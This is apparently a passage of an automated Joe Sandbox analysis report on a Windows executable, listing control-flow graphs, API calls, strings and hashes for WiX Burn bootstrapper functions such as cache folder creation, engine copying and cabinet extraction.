                                                                                                                                                              • WixBundleSourceProcessFolder, xrefs: 007D7734
                                                                                                                                                              • Failed to initialize variables., xrefs: 007D7571
                                                                                                                                                              • WixBundleSourceProcessPath, xrefs: 007D76F8
                                                                                                                                                              • Failed to set source process folder variable., xrefs: 007D7745
                                                                                                                                                              • WixBundleElevated, xrefs: 007D76A5, 007D76B6
                                                                                                                                                              • Failed to parse command line., xrefs: 007D7667
                                                                                                                                                              • Failed to set source process path variable., xrefs: 007D7709
                                                                                                                                                              • Failed to open manifest stream., xrefs: 007D75AB
                                                                                                                                                              • Failed to initialize internal cache functionality., xrefs: 007D779F
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalInitializeSection
                                                                                                                                                              • String ID: Failed to extract bootstrapper application payloads.$Failed to get manifest stream from container.$Failed to get source process folder from path.$Failed to get unique temporary folder for bootstrapper application.$Failed to initialize internal cache functionality.$Failed to initialize variables.$Failed to load catalog files.$Failed to load manifest.$Failed to open attached UX container.$Failed to open manifest stream.$Failed to overwrite the %ls built-in variable.$Failed to parse command line.$Failed to set original source variable.$Failed to set source process folder variable.$Failed to set source process path variable.$WixBundleElevated$WixBundleOriginalSource$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleUILevel
                                                                                                                                                              • API String ID: 32694325-1564579409
                                                                                                                                                              • Opcode ID: 091e4ddbcb6468803d9ae3c107ef963f5a0f771f45a4c73a0bc87824795e720d
                                                                                                                                                              • Instruction ID: 955771d9b7f86bee185e1ad013505abc0b2d545c966696c3f86d2fb00a8cca85
                                                                                                                                                              • Opcode Fuzzy Hash: 091e4ddbcb6468803d9ae3c107ef963f5a0f771f45a4c73a0bc87824795e720d
                                                                                                                                                              • Instruction Fuzzy Hash: 6FA1B572A44615BADB169AA4CC85FEAB77CBF00710F00062BF915E7340E738E954DBA1
                                                                                                                                                              Function 007D86D0 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 209fileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1253 7d86d0-7d871e CreateFileW 1254 7d8764-7d8774 call 80490d 1253->1254 1255 7d8720-7d872a GetLastError 1253->1255 1263 7d878c-7d8797 call 803edd 1254->1263 1264 7d8776-7d8787 call 800237 1254->1264 1256 7d872c-7d8735 1255->1256 1257 7d8737 1255->1257 1256->1257 1259 7d873e-7d875f call 7c3821 call 800237 1257->1259 1260 7d8739 1257->1260 1277 7d8908-7d891a call 7ee06f 1259->1277 1260->1259 1268 7d879c-7d87a0 1263->1268 1274 7d8901-7d8902 CloseHandle 1264->1274 1271 7d87bb-7d87c0 1268->1271 1272 7d87a2-7d87b6 call 800237 1268->1272 1271->1274 1276 7d87c6-7d87d5 SetFilePointerEx 1271->1276 1272->1274 1274->1277 1280 7d880f-7d881f call 804e3a 1276->1280 1281 7d87d7-7d87e1 GetLastError 1276->1281 1289 7d882b-7d883c SetFilePointerEx 1280->1289 1290 7d8821-7d8826 1280->1290 1283 7d87ee 1281->1283 1284 7d87e3-7d87ec 1281->1284 1286 7d87f5-7d880a call 7c3821 1283->1286 1287 7d87f0 1283->1287 1284->1283 1292 7d88f9-7d8900 call 800237 1286->1292 1287->1286 1293 7d883e-7d8848 GetLastError 1289->1293 1294 7d8876-7d8886 call 804e3a 1289->1294 1290->1292 1292->1274 1296 7d884a-7d8853 1293->1296 1297 7d8855 1293->1297 1294->1290 1305 7d8888-7d8898 call 804e3a 1294->1305 1296->1297 1300 7d885c-7d8871 call 7c3821 1297->1300 1301 7d8857 1297->1301 1300->1292 1301->1300 1305->1290 1309 7d889a-7d88ab SetFilePointerEx 1305->1309 1310 7d88ad-7d88b7 GetLastError 1309->1310 1311 7d88e2-7d88f2 call 804e3a 1309->1311 1312 7d88b9-7d88c2 1310->1312 1313 7d88c4 1310->1313 1311->1274 1319 7d88f4 1311->1319 1312->1313 1315 7d88cb-7d88e0 call 7c3821 1313->1315 1316 7d88c6 1313->1316 1315->1292 1316->1315 1319->1292
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(00000000,40000000,00000005,00000000,00000002,08000080,00000000,?,00000000,00000000,007C4DBC,?,?,00000000,007C4DBC,00000000), ref: 007D8713
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D8720
                                                                                                                                                                • Part of subcall function 00803EDD: ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00803F73
                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,0080B4B8,00000000,00000000,00000000,?,00000000,0080B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D87CD
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D87D7
                                                                                                                                                              • CloseHandle.KERNELBASE(00000000,?,00000000,0080B500,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 007D8902
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to copy engine from: %ls to: %ls, xrefs: 007D87A8
                                                                                                                                                              • Failed to seek to signature table in exe header., xrefs: 007D886C
                                                                                                                                                              • Failed to update signature offset., xrefs: 007D8821
                                                                                                                                                              • Failed to create engine file at path: %ls, xrefs: 007D8751
                                                                                                                                                              • cache.cpp, xrefs: 007D8744, 007D87FB, 007D8862, 007D88D1
                                                                                                                                                              • cabinet.dll, xrefs: 007D887B
                                                                                                                                                              • Failed to seek to original data in exe burn section header., xrefs: 007D88DB
                                                                                                                                                              • Failed to zero out original data offset., xrefs: 007D88F4
                                                                                                                                                              • Failed to seek to checksum in exe header., xrefs: 007D8805
                                                                                                                                                              • msi.dll, xrefs: 007D8814
                                                                                                                                                              • Failed to seek to beginning of engine file: %ls, xrefs: 007D8779
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$ErrorLast$CloseCreateHandlePointerRead
                                                                                                                                                              • String ID: Failed to copy engine from: %ls to: %ls$Failed to create engine file at path: %ls$Failed to seek to beginning of engine file: %ls$Failed to seek to checksum in exe header.$Failed to seek to original data in exe burn section header.$Failed to seek to signature table in exe header.$Failed to update signature offset.$Failed to zero out original data offset.$cabinet.dll$cache.cpp$msi.dll
                                                                                                                                                              • API String ID: 3456208997-1976062716
                                                                                                                                                              • Opcode ID: 1bfcb4d0d62b5196e27bfe6b1d3c6b58aa255ed975bbeee6dcb26cda0845f680
                                                                                                                                                              • Instruction ID: 09a59e44e22f119e87a36ecd2c69bc9ff137ab5343367cfe51fff52f7eaf62e2
                                                                                                                                                              • Opcode Fuzzy Hash: 1bfcb4d0d62b5196e27bfe6b1d3c6b58aa255ed975bbeee6dcb26cda0845f680
                                                                                                                                                              • Instruction Fuzzy Hash: 92519772A51635ABD7525A948C46FBF7678FF04B20F11012AFE10FB381EB299C0196E7
                                                                                                                                                              Function 007C762C Relevance: 34.9, APIs: 1, Strings: 22, Instructions: 420COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1321 7c762c-7c7edf InitializeCriticalSection 1322 7c7ee2-7c7f06 call 7c5623 1321->1322 1325 7c7f08-7c7f0f 1322->1325 1326 7c7f13-7c7f24 call 800237 1322->1326 1325->1322 1327 7c7f11 1325->1327 1329 7c7f27-7c7f39 call 7ee06f 1326->1329 1327->1329
                                                                                                                                                              APIs
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(007D756B,007C53BD,00000000,007C5445), ref: 007C764C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalInitializeSection
                                                                                                                                                              • String ID: #$$$'$0$Date$Failed to add built-in variable: %ls.$InstallerName$InstallerVersion$LogonUser$WixBundleAction$WixBundleActiveParent$WixBundleElevated$WixBundleExecutePackageAction$WixBundleExecutePackageCacheFolder$WixBundleForcedRestartPackage$WixBundleInstalled$WixBundleProviderKey$WixBundleSourceProcessFolder$WixBundleSourceProcessPath$WixBundleTag$WixBundleUILevel$WixBundleVersion
                                                                                                                                                              • API String ID: 32694325-3635313340
                                                                                                                                                              • Opcode ID: ca0248c020051445d495da8ca5570874e6381f73d480ba0e46e3d887965c227d
                                                                                                                                                              • Instruction ID: 2a63bed07dd3c2e95de9c65122a1d5be6f42771ad0125ed40b5f1a1505f8bc0e
                                                                                                                                                              • Opcode Fuzzy Hash: ca0248c020051445d495da8ca5570874e6381f73d480ba0e46e3d887965c227d
                                                                                                                                                              • Instruction Fuzzy Hash: 34324AB0C116299BDBA5CF5ACD887CDFBB4FB49304F5086EED20CA6250C7B51A888F45
                                                                                                                                                              Function 007D82BA Relevance: 31.7, APIs: 7, Strings: 11, Instructions: 153COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1333 7d82ba-7d8303 call 7ef8e0 1336 7d847c-7d8489 call 7c2195 1333->1336 1337 7d8309-7d8317 GetCurrentProcess call 800879 1333->1337 1342 7d8498-7d84aa call 7ee06f 1336->1342 1343 7d848b 1336->1343 1341 7d831c-7d8329 1337->1341 1344 7d832f-7d833e GetWindowsDirectoryW 1341->1344 1345 7d83b7-7d83c5 GetTempPathW 1341->1345 1346 7d8490-7d8497 call 800237 1343->1346 1348 7d8378-7d8389 call 7c337f 1344->1348 1349 7d8340-7d834a GetLastError 1344->1349 1350 7d83ff-7d8411 UuidCreate 1345->1350 1351 7d83c7-7d83d1 GetLastError 1345->1351 1346->1342 1371 7d838b-7d8390 1348->1371 1372 7d8395-7d83ab call 7c36a3 1348->1372 1357 7d834c-7d8355 1349->1357 1358 7d8357 1349->1358 1354 7d841a-7d842f StringFromGUID2 1350->1354 1355 7d8413-7d8418 1350->1355 1359 7d83de 1351->1359 1360 7d83d3-7d83dc 1351->1360 1367 7d844d-7d846e call 7c1f13 1354->1367 1368 7d8431-7d844b call 7c3821 1354->1368 1355->1346 1357->1358 1361 7d835e-7d8373 call 7c3821 1358->1361 1362 7d8359 1358->1362 1363 7d83e5-7d83fa call 7c3821 1359->1363 1364 7d83e0 1359->1364 1360->1359 1361->1346 1362->1361 1363->1346 1364->1363 1381 7d8477 1367->1381 1382 7d8470-7d8475 1367->1382 1368->1346 1371->1346 1372->1350 1383 7d83ad-7d83b2 1372->1383 1381->1336 1382->1346 1383->1346
                                                                                                                                                              APIs
                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,007C5489), ref: 007D8310
                                                                                                                                                                • Part of subcall function 00800879: OpenProcessToken.ADVAPI32(?,00000008,?,007C53BD,00000000,?,?,?,?,?,?,?,007D769D,00000000), ref: 00800897
                                                                                                                                                                • Part of subcall function 00800879: GetLastError.KERNEL32(?,?,?,?,?,?,?,007D769D,00000000), ref: 008008A1
                                                                                                                                                                • Part of subcall function 00800879: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,007D769D,00000000), ref: 0080092B
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104,00000000), ref: 007D8336
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D8340
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000000), ref: 007D83BD
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007D83C7
                                                                                                                                                              • UuidCreate.RPCRT4(?), ref: 007D8406
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to convert working folder guid into string., xrefs: 007D8446
                                                                                                                                                              • Failed to concat Temp directory on windows path for working folder., xrefs: 007D83AD
                                                                                                                                                              • cache.cpp, xrefs: 007D8364, 007D83EB, 007D843C
                                                                                                                                                              • Temp\, xrefs: 007D8395
                                                                                                                                                              • Failed to ensure windows path for working folder ended in backslash., xrefs: 007D838B
                                                                                                                                                              • Failed to get temp path for working folder., xrefs: 007D83F5
                                                                                                                                                              • Failed to create working folder guid., xrefs: 007D8413
                                                                                                                                                              • Failed to append bundle id on to temp path for working folder., xrefs: 007D8470
                                                                                                                                                              • Failed to get windows path for working folder., xrefs: 007D836E
                                                                                                                                                              • %ls%ls\, xrefs: 007D8458
                                                                                                                                                              • Failed to copy working folder path., xrefs: 007D848B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Process$CloseCreateCurrentDirectoryHandleOpenPathTempTokenUuidWindows
                                                                                                                                                              • String ID: %ls%ls\$Failed to append bundle id on to temp path for working folder.$Failed to concat Temp directory on windows path for working folder.$Failed to convert working folder guid into string.$Failed to copy working folder path.$Failed to create working folder guid.$Failed to ensure windows path for working folder ended in backslash.$Failed to get temp path for working folder.$Failed to get windows path for working folder.$Temp\$cache.cpp
                                                                                                                                                              • API String ID: 266130487-819636856
                                                                                                                                                              • Opcode ID: 9b5a54bb8df89b0e0ed545364f06d1556aa0a79460c1dc2757f13122827db10f
                                                                                                                                                              • Instruction ID: 09ee2779d8c0ee01910c99f6f14cf19888d735265d5f3ab08696ac14c99d1c73
                                                                                                                                                              • Opcode Fuzzy Hash: 9b5a54bb8df89b0e0ed545364f06d1556aa0a79460c1dc2757f13122827db10f
                                                                                                                                                              • Instruction Fuzzy Hash: CE41C776A41725B7D770AAA48C09F9E77BCFF04B10F11416ABA49F7340EA7C9D4086E2
                                                                                                                                                              Function 007E10FB Relevance: 30.0, APIs: 8, Strings: 9, Instructions: 217COMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1384 7e10fb-7e1127 CoInitializeEx 1385 7e113b-7e1186 call 7ff483 1384->1385 1386 7e1129-7e1136 call 800237 1384->1386 1392 7e1188-7e11ab call 7c3821 call 800237 1385->1392 1393 7e11b0-7e11d2 call 7ff4a4 1385->1393 1391 7e139e-7e13b0 call 7ee06f 1386->1391 1414 7e1397-7e1398 CoUninitialize 1392->1414 1400 7e128c-7e1297 SetEvent 1393->1400 1401 7e11d8-7e11e0 1393->1401 1405 7e1299-7e12a3 GetLastError 1400->1405 1406 7e12d6-7e12e4 WaitForSingleObject 1400->1406 1403 7e138f-7e1392 call 7ff4b4 1401->1403 1404 7e11e6-7e11ec 1401->1404 1403->1414 1404->1403 1408 7e11f2-7e11fa 1404->1408 1411 7e12a5-7e12ae 1405->1411 1412 7e12b0 1405->1412 1409 7e1318-7e1323 ResetEvent 1406->1409 1410 7e12e6-7e12f0 GetLastError 1406->1410 1419 7e11fc-7e11fe 1408->1419 1420 7e1274-7e1287 call 800237 1408->1420 1415 7e135a-7e1360 1409->1415 1416 7e1325-7e132f GetLastError 1409->1416 1421 7e12fd 1410->1421 1422 7e12f2-7e12fb 1410->1422 1411->1412 1417 7e12b4-7e12c4 call 7c3821 1412->1417 1418 7e12b2 1412->1418 1414->1391 1428 7e138a 1415->1428 1429 7e1362-7e1365 1415->1429 1423 7e133c 1416->1423 1424 7e1331-7e133a 1416->1424 1444 7e12c9-7e12d1 call 800237 1417->1444 1418->1417 1426 7e1200 1419->1426 1427 7e1211-7e1214 1419->1427 1420->1403 1431 7e12ff 1421->1431 1432 7e1301-7e1316 call 7c3821 1421->1432 1422->1421 1433 7e133e 1423->1433 1434 7e1340-7e1355 call 7c3821 1423->1434 1424->1423 1436 7e1206-7e120f 1426->1436 1437 7e1202-7e1204 1426->1437 1440 7e126e 1427->1440 1441 7e1216 1427->1441 1428->1403 1438 7e1386-7e1388 1429->1438 1439 7e1367-7e1381 call 7c3821 1429->1439 1431->1432 1432->1444 1433->1434 1434->1444 1446 7e1270-7e1272 1436->1446 1437->1446 1438->1403 1439->1444 1440->1446 1448 7e124e-7e1253 1441->1448 1449 7e125c-7e1261 1441->1449 1450 7e121d-7e1222 1441->1450 1451 7e126a-7e126c 1441->1451 1452 7e122b-7e1230 1441->1452 1453 7e1239-7e123e 1441->1453 1454 7e1247-7e124c 1441->1454 1455 7e1224-7e1229 1441->1455 1456 7e1255-7e125a 1441->1456 1457 7e1232-7e1237 1441->1457 1458 7e1263-7e1268 1441->1458 1459 7e1240-7e1245 1441->1459 1444->1403 1446->1400 1446->1420 1448->1420 1449->1420 1450->1420 1451->1420 1452->1420 1453->1420 1454->1420 1455->1420 1456->1420 1457->1420 1458->1420 1459->1420
                                                                                                                                                              APIs
                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000), ref: 007E111D
                                                                                                                                                              • CoUninitialize.COMBASE ref: 007E1398
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InitializeUninitialize
                                                                                                                                                              • String ID: <the>.cab$Failed to extract all files from container, erf: %d:%X:%d$Failed to initialize COM.$Failed to initialize cabinet.dll.$Failed to reset begin operation event.$Failed to set operation complete event.$Failed to wait for begin operation event.$Invalid operation for this state.$cabextract.cpp
                                                                                                                                                              • API String ID: 3442037557-1168358783
                                                                                                                                                              • Opcode ID: 6d93a1e4d00217c7df8468d809c49c0dca00c43a17362342bd9d73a5104277ce
                                                                                                                                                              • Instruction ID: 3d602a620aea6f3622d0b822a1335473957544eb716972e6e85899839eaa038d
                                                                                                                                                              • Opcode Fuzzy Hash: 6d93a1e4d00217c7df8468d809c49c0dca00c43a17362342bd9d73a5104277ce
                                                                                                                                                              • Instruction Fuzzy Hash: EA511836E471E1D7CB2056968C07EBB2658FB0D730B624369AE21FF790D67D8C4096D2
                                                                                                                                                              Function 007C42D7 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 158stringCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1465 7c42d7-7c432e InitializeCriticalSection * 2 call 7d4d05 * 2 1470 7c4334 1465->1470 1471 7c4452-7c445c call 7cb48b 1465->1471 1472 7c433a-7c4347 1470->1472 1476 7c4461-7c4465 1471->1476 1474 7c434d-7c4379 lstrlenW * 2 CompareStringW 1472->1474 1475 7c4445-7c444c 1472->1475 1477 7c43cb-7c43f7 lstrlenW * 2 CompareStringW 1474->1477 1478 7c437b-7c439e lstrlenW 1474->1478 1475->1471 1475->1472 1479 7c4474-7c447c 1476->1479 1480 7c4467-7c4473 call 800237 1476->1480 1477->1475 1484 7c43f9-7c441c lstrlenW 1477->1484 1481 7c448a-7c449f call 7c3821 1478->1481 1482 7c43a4-7c43a9 1478->1482 1480->1479 1496 7c44a4-7c44ab 1481->1496 1482->1481 1485 7c43af-7c43bf call 7c29ce 1482->1485 1488 7c44b6-7c44d0 call 7c3821 1484->1488 1489 7c4422-7c4427 1484->1489 1498 7c447f-7c4488 1485->1498 1499 7c43c5 1485->1499 1488->1496 1489->1488 1493 7c442d-7c443d call 7c29ce 1489->1493 1493->1498 1503 7c443f 1493->1503 1500 7c44ac-7c44b4 call 800237 1496->1500 1498->1500 1499->1477 1500->1479 1503->1475
                                                                                                                                                              APIs
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,?,?,007C5266,?,?,00000000,?,?), ref: 007C4303
                                                                                                                                                              • InitializeCriticalSection.KERNEL32(000000D0,?,?,007C5266,?,?,00000000,?,?), ref: 007C430C
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.attached,000004B8,000004A0,?,?,007C5266,?,?,00000000,?,?), ref: 007C4352
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.attached,burn.filehandle.attached,00000000,?,?,007C5266,?,?,00000000,?,?), ref: 007C435C
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,007C5266,?,?,00000000,?,?), ref: 007C4370
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.attached,?,?,007C5266,?,?,00000000,?,?), ref: 007C4380
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.self,?,?,007C5266,?,?,00000000,?,?), ref: 007C43D0
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.self,burn.filehandle.self,00000000,?,?,007C5266,?,?,00000000,?,?), ref: 007C43DA
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000001,?,00000000,?,?,007C5266,?,?,00000000,?,?), ref: 007C43EE
                                                                                                                                                              • lstrlenW.KERNEL32(burn.filehandle.self,?,?,007C5266,?,?,00000000,?,?), ref: 007C43FE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: lstrlen$CompareCriticalInitializeSectionString
                                                                                                                                                              • String ID: Failed to initialize engine section.$Failed to parse file handle: '%ls'$Missing required parameter for switch: %ls$burn.filehandle.attached$burn.filehandle.self$engine.cpp
                                                                                                                                                              • API String ID: 3039292287-3209860532
                                                                                                                                                              • Opcode ID: 95b77dd717e73396b965e5dd1c65ceac830074f0c0c5eaec829d5087ab15426f
                                                                                                                                                              • Instruction ID: fdc956f7deb88fdee3e96e370719e5fd817e627f47d9c03301f45e4cc71e763b
                                                                                                                                                              • Opcode Fuzzy Hash: 95b77dd717e73396b965e5dd1c65ceac830074f0c0c5eaec829d5087ab15426f
                                                                                                                                                              • Instruction Fuzzy Hash: DF519271A40655BFD764DB68CC96F9A7768FF04760F10411EFA14E7390D7B8A910CBA0
                                                                                                                                                              Function 007CC28F Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 131fileCOMMON
                                                                                                                                                              Download Yara Rule

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 1505 7cc28f-7cc2c1 1506 7cc32b-7cc347 GetCurrentProcess * 2 DuplicateHandle 1505->1506 1507 7cc2c3-7cc2e1 CreateFileW 1505->1507 1508 7cc349-7cc353 GetLastError 1506->1508 1509 7cc381 1506->1509 1510 7cc2e7-7cc2f1 GetLastError 1507->1510 1511 7cc383-7cc389 1507->1511 1512 7cc355-7cc35e 1508->1512 1513 7cc360 1508->1513 1509->1511 1514 7cc2fe 1510->1514 1515 7cc2f3-7cc2fc 1510->1515 1516 7cc38b-7cc391 1511->1516 1517 7cc393 1511->1517 1512->1513 1519 7cc367-7cc37f call 7c3821 1513->1519 1520 7cc362 1513->1520 1521 7cc305-7cc318 call 7c3821 1514->1521 1522 7cc300 1514->1522 1515->1514 1518 7cc395-7cc3a3 SetFilePointerEx 1516->1518 1517->1518 1524 7cc3da-7cc3e0 1518->1524 1525 7cc3a5-7cc3af GetLastError 1518->1525 1533 7cc31d-7cc326 call 800237 1519->1533 1520->1519 1521->1533 1522->1521 1530 7cc3fe-7cc404 1524->1530 1531 7cc3e2-7cc3e6 call 7e1741 1524->1531 1528 7cc3bc 1525->1528 1529 7cc3b1-7cc3ba 1525->1529 1534 7cc3be 1528->1534 1535 7cc3c3-7cc3d8 call 7c3821 1528->1535 1529->1528 1539 7cc3eb-7cc3ef 1531->1539 1533->1530 1534->1535 1543 7cc3f6-7cc3fd call 800237 1535->1543 1539->1530 1542 7cc3f1 1539->1542 1542->1543 1543->1530
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,08000080,00000000,?,00000000,00000000,?,007CC47F,007C5405,?,?,007C5445), ref: 007CC2D6
                                                                                                                                                              • GetLastError.KERNEL32(?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC2E7
                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002,?,00000000,00000000,?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?), ref: 007CC336
                                                                                                                                                              • GetCurrentProcess.KERNEL32(000000FF,00000000,?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC33C
                                                                                                                                                              • DuplicateHandle.KERNELBASE(00000000,?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC33F
                                                                                                                                                              • GetLastError.KERNEL32(?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC349
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(?,00000000,00000000,00000000,00000000,?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC39B
                                                                                                                                                              • GetLastError.KERNEL32(?,007CC47F,007C5405,?,?,007C5445,007C5445,00000000,?,00000000), ref: 007CC3A5
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
